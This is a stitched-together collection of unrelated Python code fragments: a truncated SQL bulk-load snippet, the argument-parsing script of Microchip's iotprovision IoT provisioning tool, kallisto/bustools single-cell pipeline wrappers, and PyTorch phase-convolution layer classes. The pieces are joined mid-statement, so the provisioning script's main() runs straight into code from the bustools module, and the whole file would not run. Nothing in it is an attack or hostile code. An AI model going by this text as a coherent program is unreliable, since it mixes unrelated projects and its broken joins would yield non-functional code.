sqlstr = "bulk insert \"{}\" from '{}' with ( formatfile = '{}' );".format(
table_name,
table_dump_fp,
table_dump_format_fp
)
if g_is_postgre:
colnames = ""
first = True
for col in local_column_names:
if not first:
colnames = colnames + ","
if first:
first = False
colnames = colnames + '"' + col + '"'
sqlstr = "copy \"{}\" ({}) from STDIN with
# Repository: microchip-pic-avr-tools/iotprovision
#!/usr/bin/env python3
"""
This script can do one or more (default: all) of the following steps:
- Generate root and signer certificates, register with AWS (certs)
- Update the kit's debugger firmware to latest version
- Provision a connected IoT kit (provision)
- Program WINC AWS parameters needed by demo app
- Program kit with a demo/application (application)
- Optionally set up WiFi credentials in demo application
"""
# (see # https://confluence.microchip.com/display/XP/Provisioning+current+state+and+improvements)
import time
import argparse
import os
import sys
import logging
from logging.config import dictConfig
import yaml
from appdirs import user_log_dir
from yaml.scanner import ScannerError
from pytrustplatform.ca_create import DEFAULT_ORGANIZATION_NAME, DEFAULT_ROOT_COMMON_NAME, DEFAULT_SIGNER_COMMON_NAME
from .iotprovision_main import iotprovision, STATUS_SUCCESS, STATUS_FAILURE
from .provisioner import WIFI_AUTHS #FIXME
from .cellular.cellularprovisioner import DEFAULT_CELLULAR_PROVIDER, CELLULAR_VALID_FREQ_BANDS
from .cellular.sequans_ciphersuites import DEFAULT_CIPHERSUITES, print_ciphersuites
from .deprecated import deprecated
# Supported cloud providers
CLOUD_PROVIDERS = ["google", "aws", "azure"]
ROOTCERTS_HELP = """
Action 'rootcerts' is used to manage root certificate storage in WINC flash.
It requires --install-root-certs or --restore-root-certs options:
--irc ROOT_CERTS_FOLDER, --install-root-certs ROOT_CERTS_FOLDER
Install all certificate files in a folder in
WINC root certificate sector
--rrc {backup,factory}, --restore-root-certs {backup,factory}
Restore WINC root certificates sector from backup or
factory defaults
When one of the above options are used, the previous root certificates sector
content will be saved to a backup file. Separate backup file is maintained
for each kit.
Usage examples:
# Install all certificate files in 'my_certs_folder' in WINC root cert sector:
iotprovision --install-root-certs my_certs_folder
# Restore previous content of WINC certificates sector from backup:
iotprovision --restore-root-certs backup
# Restore WINC root certificates sector to factory defaults:
iotprovision --restore-root-certs factory
"""
def setup_logging(user_requested_level=logging.WARNING, default_path='logging.yaml',
env_key='MICROCHIP_PYTHONTOOLS_CONFIG'):
"""
Setup logging configuration for this CLI
"""
# Logging config YAML file can be specified via environment variable
value = os.getenv(env_key, None)
if value:
path = value
else:
# Otherwise use the one shipped with this application
path = os.path.join(os.path.dirname(__file__), default_path)
# Load the YAML if possible
if os.path.exists(path):
try:
with open(path, 'rt') as file:
# Load logging configfile from yaml
configfile = yaml.safe_load(file)
# File logging goes to user log directory under Microchip/modulename
logdir = user_log_dir(__name__, "Microchip")
# Look through all handlers, and prepend log directory to redirect all file loggers
num_file_handlers = 0
for handler in configfile['handlers'].keys():
# A filename key
if 'filename' in configfile['handlers'][handler].keys():
configfile['handlers'][handler]['filename'] = os.path.join(
logdir, configfile['handlers'][handler]['filename'])
num_file_handlers += 1
if num_file_handlers > 0:
# Create it if it does not exist
os.makedirs(logdir, exist_ok=True)
if user_requested_level <= logging.DEBUG:
# Using a different handler for DEBUG level logging to be able to have a more detailed formatter
configfile['root']['handlers'].append('console_detailed')
# Remove the original console handlers
try:
configfile['root']['handlers'].remove('console_only_info')
except ValueError:
# The yaml file might have been customized and the console_only_info handler
# might already have been removed
pass
try:
configfile['root']['handlers'].remove('console_not_info')
except ValueError:
# The yaml file might have been customized and the console_only_info handler
# might already have been removed
pass
else:
# Console logging takes granularity argument from CLI user
configfile['handlers']['console_only_info']['level'] = user_requested_level
configfile['handlers']['console_not_info']['level'] = user_requested_level
# Root logger must be the most verbose of the ALL YAML configurations and the CLI user argument
most_verbose_logging = min(user_requested_level, getattr(logging, configfile['root']['level']))
for handler in configfile['handlers'].keys():
# A filename key
if 'filename' in configfile['handlers'][handler].keys():
level = getattr(logging, configfile['handlers'][handler]['level'])
most_verbose_logging = min(most_verbose_logging, level)
configfile['root']['level'] = most_verbose_logging
dictConfig(configfile)
return
except ScannerError:
# Error while parsing YAML
print("Error parsing logging config file '{}'".format(path))
except KeyError as keyerror:
# Error looking for custom fields in YAML
print("Key {} not found in logging config file".format(keyerror))
else:
# Config specified by environment variable not found
print("Unable to open logging config file '{}'".format(path))
# If all else fails, revert to basic logging at specified level for this application
print("Reverting to basic logging.")
logging.basicConfig(level=user_requested_level)
def peek_cloudprovider():
"""
Peek at the command line to determine the cloud provider, so that provider-specific defaults (e.g. ciphersuites) can be shown in help text.
"""
cloud = None
for cloud in CLOUD_PROVIDERS:
for arg in sys.argv:
if ((arg.startswith("-c") or arg.startswith("--cloud")) and arg.endswith(cloud)) or arg == cloud:
return cloud
return "aws"
def main():
"""
Iotprovision main program. Parse out command-line arguments
"""
# All possible actions. The [] at the end allows no actions as the default,
# meaning ACTIONS_DEFAULT will be used. Argparse does not allow specifying multiple
# choices (ACTIONS_DEFAULT) directly as the default, and None doesn't work.
ACTIONS_ALL = ["account", "debuggerupgrade", "wincupgrade", "rootcerts", "certs", "provision", "application", []]
# Action(s) to be performed by default (ie if none are explicitly specified)
ACTIONS_DEFAULT = ["account", "wincupgrade", "certs", "provision", "application"]
### The following is to help determine if cloud provider must be specified or not.
# Provisioning actions needing cloud provider to be specified
ACTIONS_NEEDING_CLOUDPROVIDER = ["account", "certs", "provision", "application"]
# Options/arguments that will just print something and exit, not requiring cloud provider
PRINT_ARGS = ["--help", "-h", "help", "-V", "--version", "-R", "--release-info"]
parser = argparse.ArgumentParser(description="Provision an AVR-IoT, PIC-IoT or SAM-IoT kit for a cloud provider",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# Action(s) to perform.
parser.add_argument("actions", nargs="*", choices=ACTIONS_ALL,
help=f"Action(s) to perform, if none given, default is [{' '.join(ACTIONS_DEFAULT)}]")
#Options for provisioning
parser.add_argument(
"-c", "--cloud-provider",
# --cloud provider specification is required if:
# - Any command-line argument/option is given (else just print help and exit)
# - AND NOT any of the version/help options given (these print and exit immediately)
# - AND any of the real provisioning actions are specified explicitly
# - OR no actions explictly specified (=> ACTIONS_DEFAULT will be used)
required=(len(sys.argv) > 1
and not [arg for arg in sys.argv if arg in PRINT_ARGS]
and ([action for action in sys.argv if action in ACTIONS_NEEDING_CLOUDPROVIDER]
or not [action for action in sys.argv if action in ACTIONS_ALL])),
help="Cloud provider to provision for",
choices=CLOUD_PROVIDERS)
parser.add_argument(
"-m", "--provision-method",
help="Provisioning method: Microchip sandbox, JITR or MAR (AWS custom account)",
choices=["sandbox", "custom", "jitr", "mar"], default="sandbox")
parser.add_argument(
"-a", "--aws-profile",
type=str, default="default",
help="AWS profile name")
parser.add_argument(
"-P", "--port",
type=str, default=None,
help="Serial port name for communication with kit, only used when not successfully"
" auto-detected")
# Forcing options
parser.add_argument(
"--fca", "--force-ca-certs", action="store_true", dest="force_ca_certs",
help="Force re-creation of CA certificates even if already existing")
parser.add_argument(
"--fdev", "--force-device-certs", action="store_true", dest="force_device_cert",
help="Force re-creation of device and signer certificate even if already existing")
parser.add_argument(
"--faws", "--force-aws-cloudformation", action="store_true", dest="force_aws_cloudformation",
help="Force re-creation of AWS cloudformation stack even if already existing")
parser.add_argument(
"--fwinc", "--force-wincupgrade", action="store_true", dest="force_wincupgrade",
help="Force WINC upgrade even if not required for provisioning")
parser.add_argument(
"--sprov", "--skip-program-provision-firmware", action="store_true", dest="skip_program_provision_firmware",
help="Skip programming provision firmware. NOTE: This is an advanced option and may break the process")
# Options for creation of chain-of-trust (custom provisioning)
parser.add_argument("--org", "--organization-name", type=str,
help="CA certificate issuer organization name",
required=False, default=DEFAULT_ORGANIZATION_NAME,
dest="organization_name")
parser.add_argument("--rcn", "--root-common-name", type=str,
help="Root CA certificate issuer common name",
required=False, default=DEFAULT_ROOT_COMMON_NAME,
dest="root_common_name")
parser.add_argument("--scn", "--signer-common-name", type=str,
help="Signer CA CSR common name",
required=False, default=DEFAULT_SIGNER_COMMON_NAME,
dest="signer_common_name")
# Options to manage WINC root certificate storage, used with 'rootcerts' action
# TODO: Should perhaps use this for cellular also, for HTTPS?
rootcert_opts = parser.add_mutually_exclusive_group()
rootcert_opts.add_argument("--irc", "--install-root-certs", type=str,
help="Install all certificate files in a folder in WINC root certificate storage",
dest="install_root_certs")
rootcert_opts.add_argument("--rrc", "--restore-root-certs", choices=["backup", "factory"],
help="Restore WINC root certificates from backup or factory defaults",
dest="restore_root_certs")
# WiFi setup options for demo application
parser.add_argument(
"--ssid", "--wifi-ssid", dest="wifi_ssid",
type=str, help="SSID for wifi connection")
parser.add_argument(
"--psk", "--wifi-psk", dest="wifi_psk",
type=str, default="", help="PSK (password) for wifi connection")
parser.add_argument(
"--auth", "--wifi-auth", dest="wifi_auth",
default="wpa-psk", choices=WIFI_AUTHS.keys(),
help="wifi authentication mechanism")
# Cellular options. Cellular kit is auto-detected in provisioner.
# All Cellular-only options should have a long option name STARTING WITH
# "--cellular-" to be able to warn about incorrect use (if the selected board
# is not a Cellular kit)
# TODO: Should there be an option to force Cellular provisioning even when not auto-detected?
#parser.add_argument(
# "--fcellular", "--cellular-force", action="store_true", dest="cellular_force",
# help="Force Cellular provisioning even when Cellular kit not auto-detected")
# As of now, we don't support any cellular specific options.
# Misc options
parser.add_argument("-s", "--serialnumber", type=str,
help="USB serial number of the unit to provision")
parser.add_argument("--verify", help="verify after write from file", action="store_true")
parser.add_argument("-v", "--verbose",
default="info",
choices=['debug', 'info', 'warning', 'error', 'critical'],
help="Logging verbosity/severity level")
parser.add_argument("-V", "--version", action="store_true",
help="Print iotprovision version number and exit")
parser.add_argument("-R", "--release-info", action="store_true",
help="Print iotprovision release details and exit")
args = parser.parse_args()
# If no actions were specified, use default set
if not args.actions:
args.actions
command += [bus_path]
run_executable(command)
return {'bus': out_path}
@validate_files(pre=False)
def bustools_count(
bus_path,
out_prefix,
t2g_path,
ecmap_path,
txnames_path,
tcc=False,
mm=False
):
"""Runs `bustools count`.
:param bus_path: path to BUS file to correct
:type bus_path: str
:param out_prefix: prefix of the output files to generate
:type out_prefix: str
:param t2g_path: path to output transcript-to-gene mapping
:type t2g_path: str
:param ecmap_path: path to ecmap file, as generated by `kallisto bus`
:type ecmap_path: str
:param txnames_path: path to transcript names file, as generated by `kallisto bus`
:type txnames_path: str
:param tcc: whether to generate a TCC matrix instead of a gene count matrix,
defaults to `False`
:type tcc: bool, optional
:param mm: whether to include BUS records that pseudoalign to multiple genes,
defaults to `False`
:type mm: bool, optional
:return: dictionary containing path to generated index
:rtype: dict
"""
logger.info(
'Generating count matrix {} from BUS file {}'.format(
out_prefix, bus_path
)
)
command = [get_bustools_binary_path(), 'count']
command += ['-o', out_prefix]
command += ['-g', t2g_path]
command += ['-e', ecmap_path]
command += ['-t', txnames_path]
if not tcc:
command += ['--genecounts']
if mm:
command += ['--multimapping']
command += [bus_path]
run_executable(command)
return {
'mtx':
'{}.mtx'.format(out_prefix),
'ec' if tcc else 'genes':
'{}.ec.txt'.format(out_prefix)
if tcc else '{}.genes.txt'.format(out_prefix),
'barcodes':
'{}.barcodes.txt'.format(out_prefix),
}
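# Roughly the shell command bustools_count() builds (a sketch with placeholder
# paths; gene-count mode shown -- add --multimapping when mm=True):
#   bustools count -o counts_unfiltered/cells_x_genes -g t2g.txt \
#       -e matrix.ec -t transcripts.txt --genecounts output.corrected.sorted.bus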
@validate_files(pre=False)
def bustools_capture(
bus_path,
out_path,
capture_path,
ecmap_path,
txnames_path,
capture_type='transcripts'
):
"""Runs `bustools capture`.
:param bus_path: path to BUS file to capture
:type bus_path: str
:param out_path: path to BUS file to generate
:type out_path: str
:param capture_path: path transcripts-to-capture list
:type capture_path: str
:param ecmap_path: path to ecmap file, as generated by `kallisto bus`
:type ecmap_path: str
:param txnames_path: path to transcript names file, as generated by `kallisto bus`
:type txnames_path: str
:param capture_type: the type of information in the capture list.
can be one of `transcripts`, `umis`, `barcode`.
:type capture_type: str
:return: dictionary containing path to generated index
:rtype: dict
"""
logger.info(
'Capturing records from BUS file {} to {} with capture list {}'.format(
bus_path, out_path, capture_path
)
)
command = [get_bustools_binary_path(), 'capture']
command += ['-o', out_path]
command += ['-c', capture_path]
command += ['-e', ecmap_path]
command += ['-t', txnames_path]
command += ['--complement']
command += ['--{}'.format(capture_type)]
command += [bus_path]
run_executable(command)
return {'bus': out_path}
@validate_files(pre=False)
def bustools_whitelist(bus_path, out_path):
"""Runs `bustools whitelist`.
:param bus_path: path to BUS file generate the whitelist from
:type bus_path: str
:param out_path: path to output whitelist
:type out_path: str
:return: dictionary containing path to generated index
:rtype: dict
"""
logger.info(
'Generating whitelist {} from BUS file {}'.format(out_path, bus_path)
)
command = [
get_bustools_binary_path(), 'whitelist', '-o', out_path, bus_path
]
run_executable(command)
return {'whitelist': out_path}
def write_smartseq_batch(fastq_pairs, cell_ids, out_path):
"""Write a 3-column TSV specifying batch information for Smart-seq reads.
This file is required to use `kallisto pseudo` on multiple samples (= cells).
:param fastq_pairs: list of pairs of FASTQs
:type fastq_pairs: list
:param cell_ids: list of cell IDs
:type cell_ids: list
:param out_path: path to batch file to output
:type out_path: str
:return: dictionary of written batch file
:rtype: dict
"""
logger.info(f'Writing batch definition TSV to {out_path}')
with open(out_path, 'w') as f:
for cell_id, (fastq_1, fastq_2) in zip(cell_ids, fastq_pairs):
f.write(f'{cell_id}\t{fastq_1}\t{fastq_2}\n')
return {'batch': out_path}
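# The batch TSV written above looks like this (file names are placeholders):
#   cell_001    cell_001_R1.fastq.gz    cell_001_R2.fastq.gz
#   cell_002    cell_002_R1.fastq.gz    cell_002_R2.fastq.gz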
def matrix_to_cellranger(
matrix_path, barcodes_path, genes_path, t2g_path, out_dir
):
"""Convert bustools count matrix to cellranger-format matrix.
:param matrix_path: path to matrix
:type matrix_path: str
:param barcodes_path: list of paths to barcodes.txt
:type barcodes_path: str
:param genes_path: path to genes.txt
:type genes_path: str
:param t2g_path: path to transcript-to-gene mapping
:type t2g_path: str
:param out_dir: path to output matrix
:type out_dir: str
:return: dictionary of matrix files
:rtype: dict
"""
make_directory(out_dir)
logger.info(f'Writing matrix in cellranger format to {out_dir}')
cr_matrix_path = os.path.join(out_dir, CELLRANGER_MATRIX)
cr_barcodes_path = os.path.join(out_dir, CELLRANGER_BARCODES)
cr_genes_path = os.path.join(out_dir, CELLRANGER_GENES)
# Cellranger outputs genes x cells matrix
mtx = scipy.io.mmread(matrix_path)
scipy.io.mmwrite(cr_matrix_path, mtx.T, field='integer')
with open(barcodes_path, 'r') as f, open(cr_barcodes_path, 'w') as out:
for line in f:
if line.isspace():
continue
out.write(f'{line.strip()}-1\n')
# Get all (available) gene names
gene_to_name = {}
with open(t2g_path, 'r') as f:
for line in f:
if line.isspace():
continue
split = line.strip().split('\t')
if len(split) > 2:
gene_to_name[split[1]] = split[2]
with open(genes_path, 'r') as f, open(cr_genes_path, 'w') as out:
for line in f:
if line.isspace():
continue
gene = line.strip()
gene_name = gene_to_name.get(gene, gene)
out.write(f'{gene}\t{gene_name}\n')
return {
'mtx': cr_matrix_path,
'barcodes': cr_barcodes_path,
'genes': cr_genes_path
}
def convert_matrix(
counts_dir,
matrix_path,
barcodes_path,
genes_path=None,
ec_path=None,
t2g_path=None,
txnames_path=None,
name='gene',
loom=False,
h5ad=False,
tcc=False,
threads=8,
):
"""Convert a gene count or TCC matrix to loom or h5ad.
:param counts_dir: path to counts directory
:type counts_dir: str
:param matrix_path: path to matrix
:type matrix_path: str
:param barcodes_path: list of paths to barcodes.txt
:type barcodes_path: str
:param genes_path: path to genes.txt, defaults to `None`
:type genes_path: str, optional
:param ec_path: path to ec.txt, defaults to `None`
:type ec_path: str, optional
:param t2g_path: path to transcript-to-gene mapping. If this is provided,
the third column of the mapping is appended to the
anndata var, defaults to `None`
:type t2g_path: str, optional
:param txnames_path: path to transcripts.txt, defaults to `None`
:type txnames_path: str, optional
:param name: name of the columns, defaults to "gene"
:type name: str, optional
:param loom: whether to generate loom file, defaults to `False`
:type loom: bool, optional
:param h5ad: whether to generate h5ad file, defaults to `False`
:type h5ad: bool, optional
:param tcc: whether the matrix is a TCC matrix, defaults to `False`
:type tcc: bool, optional
:param threads: number of threads to use, defaults to `8`
:type threads: int, optional
:return: dictionary of generated files
:rtype: dict
"""
results = {}
logger.info('Reading matrix {}'.format(matrix_path))
adata = import_tcc_matrix_as_anndata(
matrix_path, barcodes_path, ec_path, txnames_path, threads=threads
) if tcc else import_matrix_as_anndata(
matrix_path, barcodes_path, genes_path, t2g_path=t2g_path, name=name
)
if loom:
loom_path = os.path.join(counts_dir, '{}.loom'.format(ADATA_PREFIX))
logger.info('Writing matrix to loom {}'.format(loom_path))
adata.write_loom(loom_path)
results.update({'loom': loom_path})
if h5ad:
h5ad_path = os.path.join(counts_dir, '{}.h5ad'.format(ADATA_PREFIX))
logger.info('Writing matrix to h5ad {}'.format(h5ad_path))
adata.write(h5ad_path)
results.update({'h5ad': h5ad_path})
return results
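# Example call for a typical gene-count workflow (paths are placeholders):
# convert_matrix('counts_unfiltered',
#                'counts_unfiltered/cells_x_genes.mtx',
#                'counts_unfiltered/cells_x_genes.barcodes.txt',
#                genes_path='counts_unfiltered/cells_x_genes.genes.txt',
#                t2g_path='t2g.txt', loom=True)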
def convert_matrices(
counts_dir,
matrix_paths,
barcodes_paths,
genes_paths=None,
ec_paths=None,
t2g_path=None,
txnames_path=None,
name='gene',
loom=False,
h5ad=False,
nucleus=False,
tcc=False,
threads=8,
):
"""Convert a gene count or TCC matrix to loom or h5ad.
:param counts_dir: path to counts directory
:type counts_dir: str
:param matrix_paths: list of paths to matrices
:type matrix_paths: list
:param barcodes_paths: list of paths to barcodes.txt
:type barcodes_paths: list
:param genes_paths: list of paths to genes.txt, defaults to `None`
:type genes_paths: list, optional
:param ec_paths: list of path to ec.txt, defaults to `None`
:type ec_paths: list, optional
:param t2g_path: path to transcript-to-gene mapping. If this is provided,
the third column of the mapping is appended to the
anndata var, defaults to `None`
:type t2g_path: str, optional
:param txnames_path: list of paths to transcripts.txt, defaults to `None`
:type txnames_path: str, optional
:param name: name of the columns, defaults to "gene"
:type name: str, optional
:param loom: whether to generate loom file, defaults to `False`
:type loom: bool, optional
:param h5ad: whether to generate h5ad file, defaults to `False`
:type h5ad: bool, optional
:param nucleus: whether the matrices contain single nucleus counts, defaults to `False`
:type nucleus: bool, optional
:param tcc: whether the matrix is a TCC matrix, defaults to `False`
:type tcc: bool, optional
:param threads: number of threads to use, defaults to `8`
:type threads: int, optional
:return: dictionary of generated files
:rtype: dict
"""
results = {}
adatas = []
matrix_paths = matrix_paths or []
barcodes_paths = barcodes_paths or []
genes_paths = genes_paths or []
ec_paths = ec_paths or []
for matrix_path, barcodes_path, genes_ec_path in zip(
matrix_paths, barcodes_paths, ec_paths
if not genes_paths or None in genes_paths else genes_paths):
logger.info('Reading matrix {}'.format(matrix_path))
adatas.append(
import_tcc_matrix_as_anndata(
matrix_path,
barcodes_path,
genes_ec_path,
txnames_path,
threads=threads
) if tcc else import_matrix_as_anndata(
matrix_path,
barcodes_path,
genes_ec_path,
t2g_path=t2g_path,
name=name
)
)
logger.info('Combining matrices')
adata = sum_anndatas(*adatas) if nucleus else overlay_anndatas(*adatas)
if loom:
loom_path = os.path.join(counts_dir, '{}.loom'.format(ADATA_PREFIX))
logger.info('Writing matrices to loom {}'.format(loom_path))
adata.write_loom(loom_path)
results.update({'loom': loom_path})
if h5ad:
h5ad_path = os.path.join(counts_dir, '{}.h5ad'.format(ADATA_PREFIX))
logger.info('Writing matrices to h5ad {}'.format(h5ad_path))
adata.write(h5ad_path)
results.update({'h5ad': h5ad_path})
return results
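# Hedged usage sketch (added for illustration, not part of the original source):
# combining two batch matrices into a single AnnData written as h5ad. All paths
# below are hypothetical placeholders.
#
# convert_matrices(
#     counts_dir='counts_unfiltered',
#     matrix_paths=['batch1/output.mtx', 'batch2/output.mtx'],
#     barcodes_paths=['batch1/output.barcodes.txt', 'batch2/output.barcodes.txt'],
#     genes_paths=['batch1/output.genes.txt', 'batch2/output.genes.txt'],
#     t2g_path='t2g.txt',
#     h5ad=True,
# )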
def filter_with_bustools(
bus_path,
ecmap_path,
txnames_path,
t2g_path,
whitelist_path,
filtered_bus_path,
counts_prefix=None,
tcc=False,
mm=False,
kite=False,
temp_dir='tmp',
threads=8,
memory='4G',
count=True,
loom=False,
h5ad=False,
cellranger=False
):
"""Generate filtered count matrices with bustools.
    :param bus_path: path to the corrected, sorted BUS file
    :type bus_path: str
# Source: antsfamily/torchtool, file: torchlib/module/layers/phase_convolution.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2019-11-07 17:00:48
# @Author : <NAME> (<EMAIL>)
# @Link : http://iridescent.ink
# @Version : $1.0$
import torch as th
import torch.nn.functional as F
class PhaseConv1d(th.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=0,
dilation=1, groups=1, bias=None, padding_mode='zeros'):
super(PhaseConv1d, self).__init__()
self.weight = th.nn.Parameter(
th.zeros(out_channels, int(in_channels / groups), kernel_size))
if (bias is None) or (not bias):
self.bias = None
else:
self.bias = th.nn.Parameter(th.zeros(out_channels, 2))
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
def forward(self, x):
weight = th.exp(1j * self.weight)
weight = th.fft.ifft(weight, dim=-1)
weight = th.view_as_real(weight)
if self.bias is None:
x = th.stack((F.conv1d(x[..., 0], weight[..., 0], bias=self.bias, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups),
F.conv1d(x[..., 1], weight[..., 1], bias=self.bias, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups)), dim=-1)
else:
x = th.stack((F.conv1d(x[..., 0], weight[..., 0], bias=self.bias[..., 0], stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups),
F.conv1d(x[..., 1], weight[..., 1], bias=self.bias[..., 1], stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups)), dim=-1)
return x
class PhaseConv2d(th.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=0,
dilation=1, groups=1, bias=None, padding_mode='zeros'):
super(PhaseConv2d, self).__init__()
if type(kernel_size) is int:
kernel_size = [kernel_size] * 2
self.weight = th.nn.Parameter(th.zeros(out_channels, int(
in_channels / groups), kernel_size[0], kernel_size[1]))
if (bias is None) or (not bias):
self.bias = None
else:
self.bias = th.nn.Parameter(th.zeros(out_channels, 2))
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
def forward(self, x):
weight = th.exp(1j * self.weight)
weight = th.fft.ifft(weight, dim=-1)
weight = th.fft.ifft(weight, dim=-2)
weight = th.view_as_real(weight)
if self.bias is None:
x = th.stack((F.conv2d(x[..., 0], weight[..., 0], bias=self.bias, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups),
F.conv2d(x[..., 1], weight[..., 1], bias=self.bias, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups)), dim=-1)
else:
x = th.stack((F.conv2d(x[..., 0], weight[..., 0], bias=self.bias[..., 0], stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups),
F.conv2d(x[..., 1], weight[..., 1], bias=self.bias[..., 1], stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups)), dim=-1)
return x
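# Hedged usage sketch (added for illustration, not part of the original module):
# PhaseConv2d expects the real and imaginary parts stacked in a trailing dimension
# of size 2, i.e. inputs of shape (N, C, H, W, 2), and returns the same layout.
#
# pc2 = PhaseConv2d(in_channels=1, out_channels=3, kernel_size=3, stride=1, padding=1, bias=True)
# x2 = th.randn(6, 1, 16, 8, 2)
# y2 = pc2(x2)   # -> shape (6, 3, 16, 8, 2)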
class ComplexPhaseConv1d(th.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=0,
dilation=1, groups=1, bias=None, padding_mode='zeros'):
super(ComplexPhaseConv1d, self).__init__()
self.weight = th.nn.Parameter(
th.zeros(out_channels, int(in_channels / groups), kernel_size))
if (bias is None) or (not bias):
self.bias = None
else:
self.bias = th.nn.Parameter(th.zeros(out_channels, 2))
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
def forward(self, x):
weight = th.exp(1j * self.weight)
weight = th.fft.ifft(weight, dim=-1)
weight = th.view_as_real(weight)
if self.bias is None:
x = th.stack((F.conv1d(x[..., 0], weight[..., 0], bias=self.bias, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups) -
F.conv1d(x[..., 1], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, dilation=self.dilation, groups=self.groups),
F.conv1d(x[..., 1], weight[..., 0], bias=self.bias, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups) +
F.conv1d(x[..., 0], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, dilation=self.dilation, groups=self.groups)
), dim=-1)
else:
x = th.stack((F.conv1d(x[..., 0], weight[..., 0], bias=self.bias[..., 0], stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups) -
F.conv1d(x[..., 1], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, dilation=self.dilation, groups=self.groups),
F.conv1d(x[..., 1], weight[..., 0], bias=self.bias[..., 0], stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups) +
F.conv1d(x[..., 0], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, dilation=self.dilation, groups=self.groups)
), dim=-1)
return x
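# Note added for clarity (an interpretation of the code above, not an author comment):
# the four conv1d calls implement complex multiplication on (real, imag) pairs,
#     (a + ib) * (c + id) = (a*c - b*d) + i(a*d + b*c),
# where x[..., 0] / x[..., 1] hold the input's real/imaginary parts and
# weight[..., 0] / weight[..., 1] hold the kernel's real/imaginary parts.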
class ComplexPhaseConv2d(th.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=0,
dilation=1, groups=1, bias=None, padding_mode='zeros'):
super(ComplexPhaseConv2d, self).__init__()
if type(kernel_size) is int:
kernel_size = [kernel_size] * 2
self.weight = th.nn.Parameter(th.zeros(out_channels, int(in_channels / groups), kernel_size[0], kernel_size[1]))
if (bias is None) or (not bias):
self.bias = None
else:
self.bias = th.nn.Parameter(th.zeros(out_channels, 2))
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
def forward(self, x):
weight = th.exp(1j * self.weight)
weight = th.fft.ifft(weight, dim=-1)
weight = th.fft.ifft(weight, dim=-2)
weight = th.view_as_real(weight)
if self.bias is None:
x = th.stack((F.conv2d(x[..., 0], weight[..., 0], bias=self.bias, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups) -
F.conv2d(x[..., 1], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, dilation=self.dilation, groups=self.groups),
F.conv2d(x[..., 1], weight[..., 0], bias=self.bias, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups) +
F.conv2d(x[..., 0], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, dilation=self.dilation, groups=self.groups)
), dim=-1)
else:
x = th.stack((F.conv2d(x[..., 0], weight[..., 0], bias=self.bias[..., 0], stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups) -
F.conv2d(x[..., 1], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, dilation=self.dilation, groups=self.groups),
F.conv2d(x[..., 1], weight[..., 0], bias=self.bias[..., 0], stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups) +
F.conv2d(x[..., 0], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, dilation=self.dilation, groups=self.groups)
), dim=-1)
return x
class PhaseConvTranspose1d(th.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
output_padding=0, groups=1, bias=None, dilation=1, padding_mode='zeros'):
super(PhaseConvTranspose1d, self).__init__()
self.weight = th.nn.Parameter(th.zeros(in_channels, int(out_channels / groups), kernel_size))
if (bias is None) or (not bias):
self.bias = None
else:
self.bias = th.nn.Parameter(th.zeros(out_channels, 2))
self.stride = stride
self.padding = padding
self.output_padding = output_padding
self.dilation = dilation
self.groups = groups
def forward(self, x):
weight = th.exp(1j * self.weight)
weight = th.fft.ifft(weight, dim=-1)
weight = th.view_as_real(weight)
if self.bias is None:
x = th.stack((F.conv_transpose1d(x[..., 0], weight[..., 0], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation),
F.conv_transpose1d(x[..., 1], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation)), dim=-1)
else:
x = th.stack((F.conv_transpose1d(x[..., 0], weight[..., 0], bias=self.bias[..., 0], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation),
F.conv_transpose1d(x[..., 1], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation)), dim=-1)
return x
class PhaseConvTranspose2d(th.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
output_padding=0, groups=1, bias=None, dilation=1, padding_mode='zeros'):
super(PhaseConvTranspose2d, self).__init__()
if type(kernel_size) is int:
kernel_size = [kernel_size] * 2
self.weight = th.nn.Parameter(th.zeros(in_channels, int(out_channels / groups), kernel_size[0], kernel_size[1]))
if (bias is None) or (not bias):
self.bias = None
else:
self.bias = th.nn.Parameter(th.zeros(out_channels, 2))
self.stride = stride
self.padding = padding
self.output_padding = output_padding
self.dilation = dilation
self.groups = groups
